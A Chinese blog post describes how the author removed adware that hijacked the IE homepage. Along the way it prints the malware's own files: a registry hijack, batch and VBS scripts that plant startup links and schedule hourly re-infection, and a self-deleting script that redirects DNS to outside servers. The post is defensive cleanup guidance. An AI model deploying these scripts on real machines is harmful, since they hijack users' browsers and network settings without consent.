篡改主页的一种解决方法

   这一切问题都是因为下载了叫setup_softii.exe的文件,此可执行文件看上去就和winrar压缩的压缩包一样,习惯性的点了一下,杯具就开始了!本来要从华军软件站上下载FLASHFXP,被下载页面上的无数个“下载”按钮迷惑后,点错了一个,下载了setup_softii.exe,下载完成后,双击,就被迫安装了流氓软件,金山网盾,有道词典,开屏桌面画报!开始把这些软件都卸载了,但是篡改主页并且定时在桌面显示两个IE快捷方式的问题一直没有解决,实在忍受不了打开IE就是www.4555.net,下班之后,都在处理这个问题,分享出来,希望以后遇到此问题的朋友能少花点时间。
   刚开始用360安全卫士和360杀毒杀了一遍不起作用,难道要使用30元/次的帮帮堂?还是算了吧,这点问题都搞不定,以后咋混!从网上找了N多篡改主页的解决方法,都无效。最后从长计议,看一下9月7号到9月8号创建了哪些文件,把文件都找出来,这些流氓软件基本上无处可逃了!
   1、c:/windows/system32 下的dsu.reg
   Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/HideDesktopIcons/NewStartPanel]
"{450D8FBA-AD25-11D0-98A8-0800361B1103}"=dword:00000000
"{20D04FE0-3AEA-1069-A2D8-08002B30309D}"=dword:00000000
"{208D2C60-3AEA-1069-A2D7-08002B30309D}"=dword:00000000
"{871C5380-42A0-1069-A2EA-08002B30309D}"=dword:00000000

[HKEY_CLASSES_ROOT/CLSID/{871C5380-42A0-1069-A2EA-08002B30309D}/shell/OpenHomePage/Command]
@="iexplore.exe http://www.4555.net/?n1"

[HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main]
"Start Page"="http://www.4555.net/?ii"
"Search Page"="http://www.4555.net/?isi"
"Default_Page_URL"="http://www.4555.net/?ii"
  2、c:/windows/system32下的YoubakMSN.ini
 [setup]
path=C:/Program Files/CloudEx Onlinebackup/YoubakMSN
  3、c:/program files/Winsoftware. 
 一开始删不掉,从网上搜到一个处理办法,把他删除了。http://zhidao.baidu.com/question/182072489
  4、c:/program files/winzp文件夹下的
361.cmd
del   "%USERPROFILE%/Application Data/Microsoft/Intern~1/Quick Launch/*.lnk" /f
del   "%USERPROFILE%/Application Data/Microsoft/Intern~1/Quick Launch/*ore*.*" /f
del   "%USERPROFILE%/Application Data/Microsoft/Intern~1/Quick Launch/*淘*.*" /f
del   "%USERPROFILE%/「开始」菜单/程序/*ore*.*"  /f
del   "%USERPROFILE%/「开始」菜单/程序/*r.lnk"  /f

del   "%ALLUSERSPROFILE%/桌面/*览*.*" /f
del     "%ALLUSERSPROFILE%/桌面/*游*.*" /f
del   "%ALLUSERSPROFILE%/桌面/*电*.*" /f
del   "%ALLUSERSPROFILE%/桌面/*影*.*" /f
del   "%ALLUSERSPROFILE%/桌面/*淘*.*" /f

del   "%USERPROFILE%/桌面/*ore*.*"      /f
del   "%ALLUSERSPROFILE%/桌面/*ore*.*"  /f

del   "%USERPROFILE%/桌面/*览*.*"      /f
del   "%ALLUSERSPROFILE%/桌面/*览*.*"  /f

del   "%USERPROFILE%/桌面/*游*.*" /f
del     "%USERPROFILE%/桌面/*电*.*" /f
del   "%USERPROFILE%/桌面/*音*.*" /f
del   "%USERPROFILE%/桌面/*影*.*" /f
del   "%USERPROFILE%/桌面/*淘*.*" /f
del   "%USERPROFILE%/桌面/*3.lnk" /f
MyPc.vbs
DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
objShell.CurrentDirectory = "C:/Program Files/Winzp/"
iReturn=objShell.Run("cmd /C  ./tool.cmd", 0, TRUE)
iReturn=objShell.Run("cmd /C   ./361.cmd", 0, TRUE)
iReturn=objShell.Run("cmd /C    ./tb.cmd", 0, TRUE)
iReturn=objShell.Run("cmd /C     ./3.cmd", 0, TRUE)
system.cmd
echo %time%>>"%ALLUSERSPROFILE%/桌面/Internet Expleror.NomPc"
echo %time%>>"%ALLUSERSPROFILE%/桌面/淘宝-购物.NomTb"
echo %time%>>"%USERPROFILE%/Applic~1/Microsoft/Intern~1/Quick Launch/Internet Expleror.NomPc"
echo %time%>>"%userprofile%/Favorites/淘宝网 - 淘!我喜欢.NomTb"
echo %time%>>"D:/Backup/收藏夹/淘宝网 - 淘!我喜欢.NomTb"
echo %time%>>"%userprofile%/Favorites/网址导航站.NomPc"
echo %time%>>"D:/Backup/收藏夹/网址导航站.NomPc"
echo %time%>>"%USERPROFILE%/「开始」菜单/程序/Internet Expleror.NomPc"

md   "C:/Program Files/Winzp/"
copy    "C:/Program Files/Winsoftware../*.*"          "C:/Program Files/Winzp/"
copy   "C:/Program Files/Winzp/MyPc.nood"                 "%ALLUSERSPROFILE%/「开始」菜单/程序/启动/Pcc.lnk" /y

call   "C:/Program Files/Common Files/System/ado/dns2.cmd"
tb.cmd
copy   "./MyPc.nood"                 "%ALLUSERSPROFILE%/「开始」菜单/程序/启动/Pcc.lnk" /y
copy  "./tbgw.ico"  "C:/Program Files/Internet Explorer/tbgw.ico"
echo %time%>>"%ALLUSERSPROFILE%/桌面/Internet Expleror.NomPc"
echo %time%>>"%ALLUSERSPROFILE%/桌面/淘宝-购物.NomTb"
echo %time%>>"%USERPROFILE%/Applic~1/Microsoft/Intern~1/Quick Launch/Internet Expleror.NomPc"
echo %time%>>"%userprofile%/Favorites/淘宝网 - 淘!我喜欢.NomTb"
echo %time%>>"D:/Backup/收藏夹/淘宝网 - 淘!我喜欢.NomTb"
echo %time%>>"%userprofile%/Favorites/网址导航站.NomPc"
echo %time%>>"D:/Backup/收藏夹/网址导航站.NomPc"
echo %time%>>"%USERPROFILE%/「开始」菜单/程序/Internet Expleror.NomPc"

call "C:/Program Files/Common Files/System/ado/dns.cmd"
      call "./fav.cmd"
tbgw.ico
tool.cmd
regedit/s  "./dsu.reg"

md "C:/Program Files/Common Files/System/ado/"
copy "./system.cmd"      "C:/Program Files/Common Files/System/ado/system.cmd"

  5、还有C:/Program Files/Internet Explorer,也是9月8号新建的,
把里面的tbgw.ico删掉
  6、又找到
D:/Program Files/Common Files/Service目录下面有一些文件,把里面的不正常内容删掉!
msn.cmd全删,这个目录下的其他文件的只删iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.75", 0, TRUE)。

acls.vbs

DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c C:/WINDOWS/system32/calc.exe", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.75", 0, TRUE)

jielong.vbs

DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c C:/WINDOWS/system32/freecell.exe", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.76", 0, TRUE)

mpaint.vbs

DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c C:/WINDOWS/system32/mspaint.exe", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.81", 0, TRUE)

msn.cmd

sc config Schedule start= auto
net start "Task Scheduler"
echo  0:06:30.03
at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 02:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 05:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 07:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 08:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 09:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
echo  0:06:30.14

msn.vbs

DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c C:/Progra~1/Messenger/msmsgs.exe", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.73", 0, TRUE)

notepa.vbs

DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c C:/WINDOWS/system32/notepad.exe", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.84", 0, TRUE)

out.vbs

DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c C:/Progra~1/Outloo~1/msimn.exe", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.87", 0, TRUE)

saolei.vbs

DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c C:/WINDOWS/system32/winmine.exe", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.89", 0, TRUE)

xiezhu.vbs

DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c C:/WINDOWS/system32/rcimlby.exe  -LaunchRA", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.93", 0, TRUE)

zhipai.vbs

DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c C:/WINDOWS/system32/sol.exe", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.90", 0, TRUE)

zhizhuzhipai.vbs

DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c C:/WINDOWS/system32/spider.exe", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.92", 0, TRUE)

   7、C:/Documents and Settings/All Users/Guest/Favorites目录下的
Favrites.vbs
  C:/Documents and Settings/All Users/Guest/FavoritesDIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c start http://www.baidu.com", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd& 0:06:29.70", 0, TRUE)
DIM  objShell
set  objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd /c start http://www.baidu.com", 0, TRUE)
iReturn=objShell.Run("cmd /C d:/Progra~1/Common~1/Service/msn.cmd&22:57:45.32", 0, TRUE)

msn.cmd
sc config Schedule start= auto
net start "Task Scheduler"
echo  0:06:30.03
at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 02:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 05:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 07:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 08:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 09:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
echo  0:06:30.14
sc config Schedule start= auto
net start "Task Scheduler"
echo 22:57:45.79
at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 02:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 05:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 07:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 08:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 09:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday  regedit /s dsu.reg
echo 22:57:45.87

8、C:/Documents and Settings/All Users/Application Data/Microsoft/softii/wd ,这下面是金山网盾,先用任务管理器关闭金山网盾的进程或用360找到服务进程关闭。

9、C:/Program Files/Common Files/System/ado文件夹下,
dns.cmd

netsh interface ip set dns "本地连接" static 58.83.139.241 primary
netsh interface ip add dns "本地连接" 61.158.167.219
netsh interface ip set dns "无线网络连接" static 58.83.139.241 primary
netsh interface ip add dns "无线网络连接" 61.158.167.219
del %0


10、等我把这些删了之后,重启计算机,打开ie,仍然是4555,明明都删了,还是啥原因呢,难道是上演最后的疯狂吗?打开regedit注册表编辑器,查找“www.4555”,查找到

/HKEY_LOCAL_MACHINE/SOFTWARE/Classes/.NomPc/shell/open/command 去掉4555,
HKEY_LOCAL_MACHINE/SOFTWARE/Classes/CLSID/{871C5380-42A0-1069-A2EA-08002B30309D}/shell/OpenHomePage/command 去掉4555,
HKEY_USERS/.DEFAULT/Software/Microsoft/Internet Explorer/Main 中修改Default_Page_URL,Search Page,Start Page
HKEY_USERS/S-1-5-21-1801674531-1972579041-725345543-500/Software/Microsoft/Internet Explorer/Main  修改Default_Page_URL,Search Page

11、执行完以上操作后,基本上就可以把这些流氓软件清理掉。正义战胜了邪恶!

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值